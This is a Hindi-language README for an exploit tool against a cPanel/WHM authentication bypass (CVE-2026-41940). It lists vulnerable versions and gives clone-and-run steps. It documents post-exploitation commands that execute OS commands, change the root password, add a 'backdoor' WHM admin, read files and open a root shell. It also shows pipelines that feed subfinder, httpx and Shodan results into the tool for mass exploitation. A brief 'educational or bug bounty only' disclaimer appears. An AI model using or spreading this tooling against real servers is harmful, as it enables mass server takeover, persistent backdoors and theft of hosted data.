
cPanel/WHM प्रमाणीकरण बायपास CVE-2026-41940 का उपयोग करके root WHM पहुँच प्राप्त करता है और post-exploitation कमांड, खाता सूचीकरण, तथा इंटरैक्टिव शेल सत्र चलाता है।
⚠ यह टूल केवल शैक्षिक या बग बाउंटी उद्देश्य के लिए बनाया गया है। नियंत्रित वातावरण के बाहर अनधिकृत उपयोग पूर्णतः प्रतिबंधित है।
CVE-2026-41940 का शोषण करने के लिए एक टूल, जो cPanel & WHM (CVSS 10.0) में एक गंभीर प्रमाणीकरण बायपास है, जो अनधिकृत हमलावरों को Authorization हेडर के माध्यम से सर्वर-साइड सेशन फ़ाइलों में CRLF अनुक्रम इंजेक्ट करके रूट-स्तरीय WHM एक्सेस प्राप्त करने की अनुमति देता है — किसी क्रेडेंशियल की आवश्यकता नहीं।
CVE-2026-41940, सामान्य शब्दों में, cPanel/WHM में प्रमाणीकरण सेशन को संभालने के तरीके में एक खामी के माध्यम से शोषित किया जाता है। हमला आमतौर पर लॉगिन इंटरफ़ेस पर एक सामान्य अनुरोध के साथ शुरू होता है, जहाँ एप्लिकेशन उपयोगकर्ता क्रेडेंशियल को पूरी तरह से सत्यापित करने से पहले समय से पहले एक सेशन आरंभ कर देता है। सेशन-संबंधित इनपुट के अनुचित प्रबंधन के कारण, कुछ निर्मित या अप्रत्याशित इनपुट संरचनाएँ सर्वर द्वारा सेशन डेटा को संग्रहीत या व्याख्या करने के तरीके को बदल सकती हैं।
| संस्करण | असुरक्षित | पैच किया गया |
|---|
| 110.x | ≤ 11.110.0.96 | 11.110.0.97 |
| 118.x | ≤ 11.118.0.62 | 11.118.0.63 |
| 126.x | ≤ 11.126.0.53 | 11.126.0.54 |
| 132.x | ≤ 11.132.0.28 | 11.132.0.29 |
| 134.x | ≤ 11.134.0.19 | 11.134.0.20 |
| 136.x | ≤ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/ctdal/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows
python cve.py
# MacOS/Linux
python3 cve.py
टूल एक लक्ष्य डोमेन निर्दिष्ट करने की अपेक्षा करता है।
एकल लक्ष्य मोड:
python cve.py -u https://target1.com:2083
आप target.txt फ़ाइल से भी स्कैन कर सकते हैं (इसे बनाएँ):
python cve.py -l target.txt -t 50 -o result.json
उपलब्ध कमांड:
python cve.py -u https://victim1.com:2083 # एकल लक्ष्य स्कैन
python cve.py info -u https://victim1.com:2083 # सिस्टम जानकारी प्राप्त करता है (संस्करण, लोड, डिस्क उपयोग)।
python cve.py host -u https://victim1.com:2083 # लक्ष्य सर्वर का होस्टनाम प्राप्त करता है।
# सर्वर पर सभी खातों की सूची बनाएँ
python cve.py list -u https://target.com:2087
# OS कमांड
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"
# सर्वर जानकारी प्राप्त करें (होस्टनाम, डिस्क, MySQL होस्ट)
python cve.py info -u https://target.com:2087
# रूट पासवर्ड बदलें
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'
# इंटरैक्टिव WHM शेल
python cve.py shell -u https://target.com:2087
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
httpx -silent -ports 2085,2086 -threads 50 | \
python cve.py scan -t 40 -o results.json
# स्कोप सूची से
cat scope.txt | \
httpx -silent -ports 2085,2086 -threads 100 | \
python cve.py scan -t 30 -o results.json
# Shodan परिणाम
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | \
python cve.py -t 30 -o shodan_results.json
# कई स्रोत संयुक्त
{ subfinder -d victim.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 | \
python cve.py -t 20 --action list
सफल निष्पादन के बाद, आप एक इंटरैक्टिव WHM शेल खोल सकते हैं:
python cve.py shell -u
| कमांड | विवरण |
|---|---|
id | उपयोगकर्ता ID दिखाएँ |
hostname | सर्वर होस्टनाम प्राप्त करें |
accounts | सभी उपयोगकर्ता खातों की सूची बनाएँ |
info | लोड, डिस्क, MySQL होस्ट, संस्करण |
cat <path> | फ़ाइल सामग्री पढ़ें |
exec <cmd> | OS कमांड निष्पादित करें |
newadmin <user> <pass> | बैकडोर WHM एडमिन बनाएँ |
passwd <pass> | रूट पासवर्ड बदलें |
l [path] | निर्देशिका सूचीबद्ध करें |
help | सभी कमांड दिखाएँ |
exit | शेल मोड से बाहर निकलें |
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
[-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
[--action ACTION] [--passwd PASS] [--cmd CMD]
[--new-user USER] [--new-domain DOMAIN]
[-o OUTPUT]
Target:
-u, --url URL Single target URL (e.g. https://host:2087)
-l, --list LIST File with URLs (one per line)
--hostname HOSTNAME Override canonical Host header (auto-discovered)
Scan:
-t, --threads N Concurrent threads (default: 10)
--timeout N Request timeout seconds (default: 15)
--rate-limit N Delay between targets (default: 0)
--force Skip cPanel detection check
Post-Exploit:
--action ACTION Action: list | passwd | cmd | exec | info |
version | shell | adduser
--passwd PASS New root password (--action passwd)
--cmd CMD OS command (--action cmd/exec)
--new-user USER New cPanel username (--action adduser)
--new-domain DOMAIN New cPanel domain (--action adduser)
Output:
-o, --output FILE Save results to JSON file
--no-color Disable ANSI colors
⚠ यह टूल केवल शैक्षिक या बग बाउंटी उद्देश्य के लिए बनाया गया है। नियंत्रित वातावरण के बाहर अनधिकृत उपयोग पूर्णतः प्रतिबंधित है।